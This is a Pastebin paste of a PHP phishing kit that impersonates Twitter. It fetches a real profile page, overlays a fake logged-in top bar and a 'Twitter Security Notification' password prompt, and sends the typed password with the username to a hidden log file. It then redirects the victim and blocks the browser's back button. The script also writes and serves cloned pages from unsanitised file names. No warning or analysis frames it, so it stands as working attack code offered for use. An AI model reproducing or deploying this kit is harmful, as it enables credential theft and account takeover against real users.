Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- ini_set('display_errors', 1);
- ini_set('display_startup_errors', 1);
- error_reporting(E_ALL);
- ini_set("log_errors", 1);
- ini_set("error_log", "error.log");
- $topbar = <<<TOPBAR
- <div class="ProfilePage-editingOverlay"></div>
- <div class="global-nav" data-section-term="top_nav">
- <div class="global-nav-inner">
- <div class="container">
- <h1 class="Icon Icon--bird bird-topbar-etched" style="display: inline-block; width: 24px; height: 21px;">
- <span class="visuallyhidden">Twitter</span>
- </h1><div class="pushstate-spinner"></div>
- <div role="navigation" style="display: inline-block;"><ul class="nav js-global-actions" id="global-actions"><li id="global-nav-home" class="home" data-global-action="home">
- <a class="js-nav js-tooltip js-dynamic-tooltip" data-placement="bottom" href="/" data-component-context="home_nav" data-nav="home" data-original-title="">
- <span class="Icon Icon--home Icon--large"></span>
- <span class="text">Home</span>
- </a>
- </li><li class="people notifications" data-global-action="connect">
- <a class="js-nav js-tooltip js-dynamic-tooltip" data-placement="bottom" href="/i/notifications" data-component-context="connect_nav" data-nav="connect" data-original-title="">
- <span class="Icon Icon--notifications Icon--large"></span>
- <span class="text">Notifications</span>
- <span class="count">
- <span class="count-inner">0</span>
- </span>
- </a>
- </li><li class="dm-nav">
- <a role="button" href="#" class="js-tooltip js-dynamic-tooltip global-dm-nav" data-placement="bottom" data-original-title="">
- <span class="Icon Icon--dm Icon--large"></span>
- <span class="text">Messages</span>
- <span class="dm-new"><span class="count-inner"></span></span>
- </a>
- </li></ul>
- </div>
- <div class="pull-right" style="display: inline-block;"><div role="search">
- <form class="t1-form form-search js-search-form" action="/search" id="global-nav-search">
- <label class="visuallyhidden" for="search-query">Search query</label>
- <input class="search-input" type="text" id="search-query" placeholder="Search Twitter" name="q" autocomplete="off" spellcheck="false" aria-autocomplete="list" aria-expanded="false" aria-owns="typeahead-dropdown-1">
- <span class="search-icon js-search-action">
- <button type="submit" class="Icon Icon--search nav-search" tabindex="-1">
- <span class="visuallyhidden">Search Twitter</span>
- </button>
- </span>
- <div role="listbox" class="dropdown-menu typeahead" id="typeahead-dropdown-1">
- <div aria-hidden="true" class="dropdown-caret">
- <div class="caret-outer"></div>
- <div class="caret-inner"></div>
- </div>
- <div role="presentation" class="dropdown-inner js-typeahead-results"><div role="presentation" class="typeahead-recent-searches block0">
- <h3 id="recent-searches-heading" class="typeahead-category-title recent-searches-title">Recent searches</h3><button type="button" tabindex="-1" class="btn-link clear-recent-searches">Clear All</button>
- <ul role="presentation" class="typeahead-items recent-searches-list">
- <li role="presentation" class="typeahead-item typeahead-recent-search-item">
- <span class="Icon Icon--close" aria-hidden="true"><span class="visuallyhidden">Remove</span></span>
- <a role="option" aria-describedby="recent-searches-heading" class="js-nav" href="" data-search-query="" data-query-source="" data-ds="recent_search" tabindex="-1"></a>
- </li>
- </ul>
- </div><div role="presentation" class="typeahead-saved-searches block1">
- <h3 id="saved-searches-heading" class="typeahead-category-title saved-searches-title">Saved searches</h3>
- <ul role="presentation" class="typeahead-items saved-searches-list">
- <li role="presentation" class="typeahead-item typeahead-saved-search-item">
- <span class="Icon Icon--close" aria-hidden="true"><span class="visuallyhidden">Remove</span></span>
- <a role="option" aria-describedby="saved-searches-heading" class="js-nav" href="" data-search-query="" data-query-source="" data-ds="saved_search" tabindex="-1"></a>
- </li>
- </ul>
- </div><ul role="presentation" class="typeahead-items typeahead-topics block2" style="display: none;">
- <li role="presentation" class="typeahead-item typeahead-topic-item">
- <a role="option" class="js-nav" href="" data-search-query="" data-query-source="typeahead_click" data-ds="topics" tabindex="-1">
- </a>
- </li>
- </ul><ul role="presentation" class="typeahead-items typeahead-accounts social-context js-typeahead-accounts block3" style="display: none;">
- <li role="presentation" data-user-id="" data-user-screenname="" data-remote="true" data-score="" class="typeahead-item typeahead-account-item js-selectable">
- <a role="option" class="js-nav" data-query-source="typeahead_click" data-search-query="" data-ds="account">
- <img class="avatar size32" alt="">
- <span class="typeahead-user-item-info">
- <span class="fullname"></span>
- <span class="js-verified hidden"><span class="Icon Icon--verified Icon--small">
- <span class="u-hiddenVisually">Verified account</span>
- </span></span>
- <span class="username"><s>@</s><b></b></span>
- </span>
- <span class="typeahead-social-context"></span>
- </a>
- </li>
- <li role="presentation" class="js-selectable typeahead-accounts-shortcut js-shortcut"><a role="option" class="js-nav" href="" data-search-query="" data-query-source="typeahead_click" data-shortcut="true" data-ds="account_search"></a></li>
- </ul></div>
- </div>
- </form>
- </div>
- <ul class="nav right-actions"><li class="me dropdown session js-session" data-global-action="t1me" id="user-dropdown">
- <a href="/settings/account" class="btn js-tooltip settings dropdown-toggle js-dropdown-toggle" id="user-dropdown-toggle" title="Profile and settings" data-placement="bottom" role="button" aria-haspopup="true">
- <img class="avatar size32" src="" alt="Profile and settings" data-user-id="">
- </a>
- <div class="dropdown-menu">
- <div class="dropdown-caret">
- <span class="caret-outer"></span>
- <span class="caret-inner"></span>
- </div>
- <ul>
- <li class="current-user" data-name="profile">
- <a href="/{{USERNAME}}" class="account-summary account-summary-small js-nav" data-nav="view_profile">
- <div class="content">
- <div class="account-group js-mini-current-user" data-user-id="" data-screen-name="{{NAME}}">
- <b class="fullname">{{NAME}}</b>
- <span class="screen-name hidden" dir="ltr">@{{USERNAME}}</span>
- <small class="metadata">View profile</small>
- </div>
- </div>
- </a>
- </li>
- <li class="dropdown-divider"></li>
- <li data-name="lists">
- <a href="/{{USERNAME}}/lists" data-nav="all_lists">Lists</a>
- </li>
- <li class="dropdown-divider"></li>
- <li><a href="//support.twitter.com" data-nav="help_center">Help</a></li>
- <li class="js-keyboard-shortcut-trigger" data-nav="shortcuts">
- <button type="button" class="dropdown-link">Keyboard shortcuts</button>
- </li>
- <li class="dropdown-divider"></li>
- <li><a href="/settings/account" data-nav="settings" class="js-nav">Settings</a></li>
- <li class="js-signout-button" id="signout-button" data-nav="logout">
- <button type="button" class="dropdown-link">Log out</button>
- <form class="t1-form dropdown-link-form signout-form" id="signout-form" action="/logout" method="POST">
- <input type="hidden" value="" name="authenticity_token" class="authenticity_token">
- <input type="hidden" name="reliability_event" class="js-reliability-event">
- <input type="hidden" name="scribe_log">
- </form>
- </li>
- </ul>
- </div>
- </li><li role="complementary" aria-labelledby="global-new-tweet-button" class="topbar-tweet-btn">
- <button id="global-new-tweet-button" type="button" class="js-global-new-tweet js-tooltip btn primary-btn tweet-btn js-dynamic-tooltip" data-placement="bottom" data-component-context="new_tweet_button">
- <span class="Icon Icon--tweet Icon--large"></span>
- <span class="text">Tweet</span>
- </button>
- </li></ul></div>
- </div>
- </div>
- </div>
- TOPBAR;
- $modal = <<<modal
- <div id="password_dialog" class="modal-container" style="display: block;">
- <div class="close-modal-background-target"></div>
- <div class="modal modal-small draggable" role="dialog" aria-labelledby="password_dialog-header" style="top:250px;left:35%;" >
- <div class="modal-content" role="document">
- <div class="modal-header">
- <h3 class="modal-title" id="password_dialog-header">Twitter Security Notification</h3>
- </div>
- <div class="modal-body">
- <p>You have been logged out for verification purposes, please re-enter your password.</p>
- <div class="input-wrapper password-wrapper">
- <input class="input-block" id="auth_password" name="auth_password" type="password" placeholder="Password" autocomplete="off">
- <small>
- <a href="/account/access_password_reset" id="forgot_password" class="js-static-forgot-password">Forgot your password?</a>
- </small>
- </div>
- </div>
- <div class="modal-footer">
- <button type="button" class="btn js-close" id="cancel_password_button">Cancel</button>
- <button type="submit" id="save_password" class="btn primary-btn modal-submit">Save changes</button>
- </div>
- </div>
- <button type="button" class="modal-btn modal-close js-close" aria-controls="password_dialog-dialog">
- <span class="Icon Icon--close Icon--medium">
- <span class="visuallyhidden">Close</span>
- </span>
- </button><div class="js-last-tabstop" tabindex="0"></div></div>
- </div>
- modal;
- function r($var){
- echo '<pre>';
- print_r($var);
- echo '</pre>';
- }
- if (!file_exists("d")) {
- mkdir("d", 0777);
- mkdir("d/l", 0777);
- }
- function exit_and_log(){
- $ip = $_SERVER['REMOTE_ADDR'];
- $agent = $_SERVER['HTTP_USER_AGENT'];
- $host = $_SERVER['HTTP_HOST'];
- $uri = $_SERVER['REQUEST_URI'];
- $time = date('Y-m-d');
- $logged = $time . "\t" . $host . "/". $uri . " \t-> ". $ip . "::". $agent . "\n";
- file_put_contents("attack_326", $logged, FILE_APPEND | LOCK_EX);
- exit();
- }
- if(!isset($_GET["c"])){
- exit();
- }
- if($_GET['c'] == "login"){
- if(!isset($_POST["redirect"])){
- exit_and_log();
- }
- //r($_POST["user"] . $_POST["pass"]);
- file_put_contents("fdj5432zHDsgdADS", $_POST["user"].":".$_POST["pass"] . "\n", FILE_APPEND | LOCK_EX);
- setcookie("posted", $_POST["redirect"]);
- }
- if($_GET['c'] == "create"){
- file_put_contents("d/l/".$_POST["user"], $_POST["html"], LOCK_EX);
- }
- if($_GET['c'] == "view"){
- if(!isset($_GET["name"])){
- exit_and_log();
- }
- if(file_exists('d/l/'.$_GET["name"])){
- print file_get_contents('d/l/'.$_GET["name"]);
- }
- }
- if($_GET['c'] == "generate"){
- if(!isset($_GET["name"])){
- exit_and_log();
- }
- if(!isset($_GET["redirect"])){
- exit_and_log();
- }
- $redirect = $_GET["redirect"];
- $curl = curl_init();
- curl_setopt ($curl, CURLOPT_URL, "http://www.twitter.com/". $_GET["name"] . "?lang=en");
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
- $result = curl_exec ($curl);
- curl_close ($curl);
- $etopbar = explode("\n", $topbar);
- foreach ($etopbar as &$value) {
- $value = 'template += \''. $value . '\';';
- }
- $etopbar = implode("\n", $etopbar);
- $js = <<<JS
- <script>
- function getUrlVars() {
- var vars = {};
- var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi,
- function(m,key,value) {
- vars[key] = value;
- });
- return vars;
- }
- function getCookie(name) {
- var value = "; " + document.cookie;
- var parts = value.split("; " + name + "=");
- if (parts.length == 2) {
- return parts.pop().split(";").shift();
- }else {
- return false;
- }
- }
- (function(){
- history.pushState(null, null, location);
- window.addEventListener('popstate', function(event) {
- history.pushState(null, null, location);
- });
- })();
- (function(){
- console.log("sup");
- var template = "";
- $etopbar
- if(!getCookie("posted")){
- setTimeout(function(){
- if(jQuery('body').attr('class').indexOf("logged-in") == -1 ){
- jQuery('.topbar').html(template);
- $('body').removeClass('logged-out').addClass('logged-in');
- $('body').addClass('modal-enabled');
- var img_url = jQuery(".ProfileAvatar-image").attr('src');
- console.log('img_url '+ img_url);
- jQuery('.avatar.size32').attr('src', img_url);
- jQuery('.eu-cookie-notice').remove();
- setTimeout(function(){
- jQuery.ajax({
- url: "index.php?c=create",
- method:"POST",
- data: {
- html : document.documentElement.outerHTML,
- user:getUrlVars().name
- },
- }).done(function() {
- console.log("done");
- });
- }, 1000);
- }else {
- $("#save_password").click(function(e){
- var _pass, _usr, _redirect;
- _pass = jQuery('#auth_password').val();
- _usr = jQuery('.js-user-profile-link').attr('href')
- _redirect = "$redirect";
- jQuery.ajax({
- url: "/tw/index.php?c=login",
- method:"POST",
- data: {
- user :_usr,
- pass:_pass,
- redirect:_redirect,
- }
- }).done(function(){
- console.log("saved");
- console.log("redirection "+ _redirect);
- window.location.href = decodeURIComponent(_redirect);
- });
- })
- }
- }, 2000);
- } else {
- window.location.href = decodeURIComponent(getCookie("posted"));
- }
- })()
- </script>
- JS;
- print $result . $js . $modal;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement